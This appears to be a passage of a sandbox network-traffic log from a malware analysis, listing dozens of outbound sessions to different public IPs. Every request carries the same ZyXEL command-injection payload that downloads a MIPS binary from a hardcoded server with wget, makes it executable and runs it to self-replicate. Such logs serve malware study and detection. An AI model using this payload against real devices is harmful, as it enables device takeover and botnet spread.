                                                      Feb 2, 2024 06:35:47.514595032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3028192.168.2.1435472216.245.252.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514638901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3029192.168.2.1456718194.155.16.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514672995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3030192.168.2.1454626189.45.238.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514719009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3031192.168.2.1436270112.142.69.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514761925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3032192.168.2.1446098197.188.16.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514816046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3033192.168.2.1457418160.217.174.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514852047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3034192.168.2.145484285.135.110.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514899969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3035192.168.2.1443940107.240.236.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514957905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3036192.168.2.144882049.235.82.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514981031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3037192.168.2.143300238.165.218.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515022039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3038192.168.2.144906035.60.39.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515048981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3039192.168.2.1449264115.241.42.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515072107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3040192.168.2.1434472175.132.217.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515114069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3041192.168.2.143762227.158.239.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515166998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3042192.168.2.1453362213.42.5.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515229940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3043192.168.2.1449284115.179.217.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515249968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3044192.168.2.1453512100.174.125.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515284061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3045192.168.2.144782279.216.247.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515312910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3046192.168.2.1448010131.12.110.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515351057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3047192.168.2.1432830178.147.196.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515388012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3048192.168.2.1432912145.171.253.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515430927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3049192.168.2.146066467.236.86.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515477896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3050192.168.2.143441048.150.224.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515518904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3051192.168.2.1435358112.5.59.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515542984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3052192.168.2.1438202144.134.126.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515573978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3053192.168.2.143978083.9.75.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515619040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3054192.168.2.146085266.200.98.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515661001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3055192.168.2.145617889.193.194.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515682936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3056192.168.2.143971427.215.110.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515739918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3057192.168.2.1457196106.136.33.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515783072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3058192.168.2.1454388176.174.121.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515815020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3059192.168.2.1453278140.61.20.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515841961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3060192.168.2.145181477.179.137.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515897989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3061192.168.2.1447242200.230.171.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515937090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3062192.168.2.1450656182.44.227.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.515957117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3063192.168.2.1447680169.119.231.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516000986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3064192.168.2.14527264.121.242.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516058922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3065192.168.2.1452760221.70.196.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516078949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3066192.168.2.1454942126.94.119.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516119003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3067192.168.2.144847491.44.176.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516158104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3068192.168.2.1441172179.174.170.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516189098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3069192.168.2.143845081.69.105.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516228914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3070192.168.2.1441402172.222.181.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516278028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3071192.168.2.1443706105.66.155.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516310930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3072192.168.2.1455544129.29.245.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516350985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3073192.168.2.143943823.79.57.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516405106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3074192.168.2.14572042.249.42.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516441107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3075192.168.2.1449856156.124.137.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516489983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3076192.168.2.144447632.241.224.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516530037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3077192.168.2.1456358152.179.204.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516571999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3078192.168.2.145836286.242.150.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516612053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3079192.168.2.1453752161.173.180.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516649008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3080192.168.2.145594464.168.36.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516690969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3081192.168.2.1456462151.9.3.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516738892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3082192.168.2.1446556193.138.173.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516777039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3083192.168.2.144916078.4.233.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516818047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3084192.168.2.1446784205.47.176.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516870975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3085192.168.2.1456990178.167.36.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516907930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3086192.168.2.1451874142.11.208.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516956091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3087192.168.2.1442856132.185.16.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.516988039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3088192.168.2.1448042211.234.60.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517025948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3089192.168.2.145336845.9.125.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.517069101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3090192.168.2.1449664173.194.152.185443
                                                      TimestampBytes transferredDirectionData
